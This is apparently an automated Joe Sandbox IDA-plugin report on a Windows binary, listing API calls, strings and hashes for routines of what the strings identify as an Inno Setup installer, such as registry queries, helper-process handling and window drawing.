                                                                          • 73A24C40.GDI32(?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4), ref: 0041CA9B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CACC
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4), ref: 0041CAE4
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?), ref: 0041CAED
                                                                          • 73A18830.GDI32(0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CAFC
                                                                          • 73A122A0.GDI32(0041CDAC,0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CB05
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CB1E
                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CB35
                                                                          • 73A24D40.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB7A,?,?,00000000), ref: 0041CB51
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CB5E
                                                                          • DeleteDC.GDI32(00000000), ref: 0041CB74
                                                                            • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                          • String ID:
                                                                          • API String ID: 1381628555-0
                                                                          • Opcode ID: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                          • Instruction ID: 7128b10ae0d2f5501f58bad1f60f679124a592cf14607d549707b49f1954e982
                                                                          • Opcode Fuzzy Hash: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                          • Instruction Fuzzy Hash: 5961FC71A44609ABDF10EBE5DC86FAFB7B8EF48704F10446AF504E7281C67CA9418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DEF6
                                                                          • GetVersion.KERNEL32(00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF13
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF2C
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DF32
                                                                          • FreeSid.ADVAPI32(00000000,0042E0A7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E09A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                          • API String ID: 1717332306-1888249752
                                                                          • Opcode ID: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                          • Instruction ID: b47b297bded1d11ddf8dbbdf8866b420117faccba79691f7cf002b7c56945d2e
                                                                          • Opcode Fuzzy Hash: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                          • Instruction Fuzzy Hash: 0E51B471B44629AEDB10EAE69C42F7F77ECEB09304F94447BB500E7282C5BC9905866D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000,004928CB,?,00000000), ref: 0049226B
                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000), ref: 0049227E
                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000), ref: 0049228E
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004922AF
                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000), ref: 004922BF
                                                                            • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                          • API String ID: 2000705611-3672972446
                                                                          • Opcode ID: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                          • Instruction ID: 3aaa1206ea96c942a1dc7cc704d64c74666df5688c5e5e951628029b4c51e49f
                                                                          • Opcode Fuzzy Hash: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                          • Instruction Fuzzy Hash: A791C330A04204BFDF11EBA5C956BAF7BA4EB49314F924477F800AB392D6BC9C05CB19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00458CC6,?,?,?,?,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458B78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                          • API String ID: 1452528299-1593206319
                                                                          • Opcode ID: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                          • Instruction ID: c0b81f7498e5b7e500974e5393cbc04c1f71ed909e083ee47f99453e8a5d0863
                                                                          • Opcode Fuzzy Hash: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                          • Instruction Fuzzy Hash: 11616C30B002445BDB11EB6998827AE7BA5AB49719F50846FF801EB383DF789D09C769
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B333
                                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B33D
                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B34F
                                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B366
                                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B372
                                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B39F
                                                                          • 73A1A480.USER32(00000000,00000000,0041B3D2,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                          • DeleteDC.GDI32(?), ref: 0041B449
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                          • String ID:
                                                                          • API String ID: 359944910-0
                                                                          • Opcode ID: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                          • Instruction ID: ef99a8f9a6f00624a9096b2aeeb37702e3b70ceb3a8cbf3cb68c8f3869cb2bd7
                                                                          • Opcode Fuzzy Hash: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                          • Instruction Fuzzy Hash: 1541D071E40619AFDF10DAE9D846FEFB7BCEF08704F104466B614FB281C67869408BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046E55B
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046E64E
                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0046E664
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046E689
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                          • API String ID: 971782779-3668018701
                                                                          • Opcode ID: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                          • Instruction ID: dad63e880d71d64191cbb6a8ee4696ca6eb4502e54dc837f5c65c8de11b949a7
                                                                          • Opcode Fuzzy Hash: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                          • Instruction Fuzzy Hash: A5D13474A00249AFDB01EF99D885BDEBBF5AF08314F54402AF800B7391D778AE45CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,?,00000000,?,00000000,0045334D,?,00458E8E,00000003,00000000,00000000,00453384), ref: 004531CD
                                                                            • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                          • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453251
                                                                          • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453280
                                                                          Strings
                                                                          • , xrefs: 0045313E
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453124
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004530EB
                                                                          • RegOpenKeyEx, xrefs: 00453150
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2812809588-1577016196
                                                                          • Opcode ID: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                          • Instruction ID: 9b4ba10c22eae4ee7854298b287fdc99132420248117da062c6f054c990cd466
                                                                          • Opcode Fuzzy Hash: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                          • Instruction Fuzzy Hash: 90911371D04608ABDB11DFA5C941BDEB7B9EB48346F50407BF900F7282D6789F098B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?), ref: 00456E87
                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00456EA3
                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00456EB1
                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 00456EC2
                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F09
                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F25
                                                                          Strings
                                                                          • Helper process exited., xrefs: 00456ED1
                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 00456E79
                                                                          • Helper process exited, but failed to get exit code., xrefs: 00456EFB
                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00456EEF
                                                                          • Helper isn't responding; killing it., xrefs: 00456E93
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                          • API String ID: 3355656108-1243109208
                                                                          • Opcode ID: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                          • Instruction ID: e3dcae7ee27b0c74354dd39b82ec863519094067a73f9fae9ec07b4aeacd6428
                                                                          • Opcode Fuzzy Hash: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                          • Instruction Fuzzy Hash: 09217171A047019AC720EB79D44575BB6E49F08309F41CC2FF99ACB283D77CE8488B2A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC1C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452E8F
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452FCB
                                                                            • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                          Strings
                                                                          • , xrefs: 00452DF1
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DD7
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DA7
                                                                          • RegCreateKeyEx, xrefs: 00452E03
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2481121983-1280779767
                                                                          • Opcode ID: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                          • Instruction ID: bd46e7fedae0378ea69e291eeb16b1e61bf49070ab8af015702d395f50882908
                                                                          • Opcode Fuzzy Hash: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                          • Instruction Fuzzy Hash: D281F076A00209AFDB00DFD5D941BEEB7B9EB49305F50442BF900F7282D778AA05DB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00452240: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                            • Part of subcall function 00452240: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00490BED
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00490D41), ref: 00490C0E
                                                                          • CreateWindowExA.USER32(00000000,STATIC,00490D50,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00490C35
                                                                          • SetWindowLongA.USER32(?,000000FC,004903C8), ref: 00490C48
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC,00490D50), ref: 00490C78
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00490CEC
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000), ref: 00490CF8
                                                                            • Part of subcall function 00452590: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                          • 73A25CF0.USER32(?,00490D1B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC), ref: 00490D0E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                          • API String ID: 170458502-2312673372
                                                                          • Opcode ID: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                          • Instruction ID: 92ce551481e6a002572db3822da7cd140e35cf2137eba75a76cf686200e2178a
                                                                          • Opcode Fuzzy Hash: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                          • Instruction Fuzzy Hash: EE414371A44208AFDF10EBA5DC42F9E7BF8EB09704F514576F510F7291D6799E008BA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042EA88
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EA9C
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EAA9
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EAB6
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0042EB02
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042EB40
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                          • Instruction ID: 33f08c3eecf59c1efe6da1d62cafc2865f84f18ea85c38477b96760789069036
                                                                          • Opcode Fuzzy Hash: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                          • Instruction Fuzzy Hash: 9721D4B67017246FD300DA69DC81F3B7B98DB84714F09462AF945DB381DA78EC008A59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0045EEFC
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0045EF10
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0045EF1D
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0045EF2A
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0045EF76
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0045EFB4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                          • Instruction ID: 495c241bec279fa6e8d852d727b900aa08f5c3bdd79c5966852e86187c859b95
                                                                          • Opcode Fuzzy Hash: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                          • Instruction Fuzzy Hash: EE21C2B2205604BFD2049669CC81F3B7799DB84711F09452AFD44DB3C2DA78ED098A99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00457207,?,00000000,0045726A,?,?,02113858,00000000), ref: 00457085
                                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570E2
                                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570EF
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045713B
                                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000), ref: 00457161
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,0045719C,?,00000000), ref: 00457168
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
